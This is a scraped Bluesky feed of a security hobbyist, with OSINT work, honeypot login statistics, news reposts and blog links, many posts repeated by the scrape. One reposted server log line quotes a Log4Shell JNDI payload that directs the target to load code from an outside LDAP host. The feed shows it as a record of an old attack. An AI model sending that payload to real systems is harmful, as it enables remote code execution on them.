moltenbit
@moltenbit.bsky.social
IT, cybersecurity, cybercrime, OSINT. i like running honeypots.
blog: https://moltenbit.net
mastodon: https://infosec.exchange/@moltenbit
blog: https://moltenbit.net
mastodon: https://infosec.exchange/@moltenbit
Pinned
moltenbit
@moltenbit.bsky.social
· May 31
Geolocation case solved on the @bellingcat.com Discord 🕵️♂️🌍
A video claimed to show wind turbines arriving in La Guajira, Colombia — but it was actually filmed in OK, USA.
The fact-check is now live on Colombiacheck:
🔗 urlr.me/rNzKbD
Blog post about it by me:
📝 urlr.me/QhDE97
#OSINT #Geolocation
A video claimed to show wind turbines arriving in La Guajira, Colombia — but it was actually filmed in OK, USA.
The fact-check is now live on Colombiacheck:
🔗 urlr.me/rNzKbD
Blog post about it by me:
📝 urlr.me/QhDE97
#OSINT #Geolocation
Reposted by moltenbit
Over 115,000 WatchGuard Firebox devices exposed online remain unpatched against a critical remote code execution (RCE) vulnerability actively exploited in attacks.
Critical RCE flaw impacts over 115,000 WatchGuard firewalls
Over 115,000 WatchGuard Firebox devices exposed online remain unpatched against a critical remote code execution (RCE) vulnerability actively exploited in attacks.
www.bleepingcomputer.com
December 22, 2025 at 9:01 AM
Over 115,000 WatchGuard Firebox devices exposed online remain unpatched against a critical remote code execution (RCE) vulnerability actively exploited in attacks.
If your website asks for a 2FA code but doesn't automatically select the input field, I'm judging your entire engineering team.
December 22, 2025 at 9:08 AM
If your website asks for a 2FA code but doesn't automatically select the input field, I'm judging your entire engineering team.
December 9, 2025 at 2:55 PM
Reposted by moltenbit
[!] FILE: /var/log/[redacted]/2021_12_13.request.log LINE_NUMBER: 8 DEOBFUSCATED_STRING: ${jndi:ldap: LINE: [remote-server01] - - [13/Dez/2021:02:02:36 +0000] "GET https://[local-server01]/$%7Bjndi:ldap://[remote-server01]:1389/Exploit%7D HTTP/1.1" 404 277
Dec 2021 in one line.
#sysadmin #infosec
Dec 2021 in one line.
#sysadmin #infosec
November 25, 2025 at 4:18 PM
[!] FILE: /var/log/[redacted]/2021_12_13.request.log LINE_NUMBER: 8 DEOBFUSCATED_STRING: ${jndi:ldap: LINE: [remote-server01] - - [13/Dez/2021:02:02:36 +0000] "GET https://[local-server01]/$%7Bjndi:ldap://[remote-server01]:1389/Exploit%7D HTTP/1.1" 404 277
Dec 2021 in one line.
#sysadmin #infosec
Dec 2021 in one line.
#sysadmin #infosec
📊 Honeypot Login Attempts (24h):
👤 Usernames:
root (1,547), admin (203), oracle (71), user (47)
🔑 Passwords:
1 (1,417), 123456 (282), 123 (174), abc123 (54)
👉 moltenbit.net
#infosec #honeypot #cybersecurity
👤 Usernames:
root (1,547), admin (203), oracle (71), user (47)
🔑 Passwords:
1 (1,417), 123456 (282), 123 (174), abc123 (54)
👉 moltenbit.net
#infosec #honeypot #cybersecurity
moltenbit - IT, cybersecurity, OSINT & more...
moltenbit.net - IT, cybersecurity, OSINT & more...
moltenbit.net
June 3, 2025 at 5:21 PM
📊 Honeypot Login Attempts (24h):
👤 Usernames:
root (1,547), admin (203), oracle (71), user (47)
🔑 Passwords:
1 (1,417), 123456 (282), 123 (174), abc123 (54)
👉 moltenbit.net
#infosec #honeypot #cybersecurity
👤 Usernames:
root (1,547), admin (203), oracle (71), user (47)
🔑 Passwords:
1 (1,417), 123456 (282), 123 (174), abc123 (54)
👉 moltenbit.net
#infosec #honeypot #cybersecurity
June 2, 2025 at 7:40 AM
Geolocation case solved on the @bellingcat.com Discord 🕵️♂️🌍
A video claimed to show wind turbines arriving in La Guajira, Colombia — but it was actually filmed in OK, USA.
The fact-check is now live on Colombiacheck:
🔗 urlr.me/rNzKbD
Blog post about it by me:
📝 urlr.me/QhDE97
#OSINT #Geolocation
A video claimed to show wind turbines arriving in La Guajira, Colombia — but it was actually filmed in OK, USA.
The fact-check is now live on Colombiacheck:
🔗 urlr.me/rNzKbD
Blog post about it by me:
📝 urlr.me/QhDE97
#OSINT #Geolocation
May 31, 2025 at 5:21 PM
Geolocation case solved on the @bellingcat.com Discord 🕵️♂️🌍
A video claimed to show wind turbines arriving in La Guajira, Colombia — but it was actually filmed in OK, USA.
The fact-check is now live on Colombiacheck:
🔗 urlr.me/rNzKbD
Blog post about it by me:
📝 urlr.me/QhDE97
#OSINT #Geolocation
A video claimed to show wind turbines arriving in La Guajira, Colombia — but it was actually filmed in OK, USA.
The fact-check is now live on Colombiacheck:
🔗 urlr.me/rNzKbD
Blog post about it by me:
📝 urlr.me/QhDE97
#OSINT #Geolocation
Funnull enabled large-scale crypto scams by leasing IP space + hosting 332K+ fast-flux domains across AWS, Azure, and others. FBI calls this “infrastructure laundering.”. IOCs can be found here: www.ic3.gov/CSA/2025/250... via @briankrebs.infosec.exchange.ap.brid.gy
May 30, 2025 at 7:27 AM
Funnull enabled large-scale crypto scams by leasing IP space + hosting 332K+ fast-flux domains across AWS, Azure, and others. FBI calls this “infrastructure laundering.”. IOCs can be found here: www.ic3.gov/CSA/2025/250... via @briankrebs.infosec.exchange.ap.brid.gy
Interesting that @crowdstrike.com Falcon doesn't detect the EICAR test file on VirusTotal.
www.virustotal.com/gui/file/275...
#infosec #malware #cybersecurity
www.virustotal.com/gui/file/275...
#infosec #malware #cybersecurity
VirusTotal
VirusTotal
www.virustotal.com
May 28, 2025 at 11:07 AM
Interesting that @crowdstrike.com Falcon doesn't detect the EICAR test file on VirusTotal.
www.virustotal.com/gui/file/275...
#infosec #malware #cybersecurity
www.virustotal.com/gui/file/275...
#infosec #malware #cybersecurity
#microsoft #outlook still using #windows xp style recycle bin icon when deleting mails seems wild to me
May 28, 2025 at 8:46 AM
#microsoft #outlook still using #windows xp style recycle bin icon when deleting mails seems wild to me
Reposted by moltenbit
If you load this page it contacts 82 IP addresses executing 256 separate HTTP transactions to download 18MB of data writing 64 cookies to your device to tell you “no”
May 24, 2025 at 10:37 AM
If you load this page it contacts 82 IP addresses executing 256 separate HTTP transactions to download 18MB of data writing 64 cookies to your device to tell you “no”
New blog post:
Send out custom e-mail notifications to admins when new devices join Intune!
moltenbit.net/posts/custom...
#intune #linux
Send out custom e-mail notifications to admins when new devices join Intune!
moltenbit.net/posts/custom...
#intune #linux
Custom Admin Notifications for New Intune Enrollments
As of now there’s no native way to send notifications to your admins when new devices join Intune, which is quite odd.
This script changes this and lets you send custom notifications to recipients of ...
moltenbit.net
May 25, 2025 at 8:35 AM
New blog post:
Send out custom e-mail notifications to admins when new devices join Intune!
moltenbit.net/posts/custom...
#intune #linux
Send out custom e-mail notifications to admins when new devices join Intune!
moltenbit.net/posts/custom...
#intune #linux
Couple days ago I published my walkthrough for #OSINT exercise 005 by @gralhix.bsky.social . Great challenges, looking forward to the others.
moltenbit.net/posts/gralhi...
moltenbit.net/posts/gralhi...
Gralhix OSINT exercise 005 walkthrough
This is a walkthrough of the OSINT exercise 005 by Gralhix.
Starting off this OSINT challenge I did a reverse image search which led to nothing, unsurprisingly, since the image is taken from a livestr...
moltenbit.net
May 24, 2025 at 7:22 PM
Couple days ago I published my walkthrough for #OSINT exercise 005 by @gralhix.bsky.social . Great challenges, looking forward to the others.
moltenbit.net/posts/gralhi...
moltenbit.net/posts/gralhi...
Reposted by moltenbit
New, from me:
KrebsOnSecurity last week was hit by a near record distributed denial-of-service (DDoS) attack that clocked in at more than 6.3 terabits of data per second (a terabit is one trillion bits of data). The brief attack appears to have been a test […]
[Original post on infosec.exchange]
KrebsOnSecurity last week was hit by a near record distributed denial-of-service (DDoS) attack that clocked in at more than 6.3 terabits of data per second (a terabit is one trillion bits of data). The brief attack appears to have been a test […]
[Original post on infosec.exchange]
May 20, 2025 at 9:42 PM
New, from me:
KrebsOnSecurity last week was hit by a near record distributed denial-of-service (DDoS) attack that clocked in at more than 6.3 terabits of data per second (a terabit is one trillion bits of data). The brief attack appears to have been a test […]
[Original post on infosec.exchange]
KrebsOnSecurity last week was hit by a near record distributed denial-of-service (DDoS) attack that clocked in at more than 6.3 terabits of data per second (a terabit is one trillion bits of data). The brief attack appears to have been a test […]
[Original post on infosec.exchange]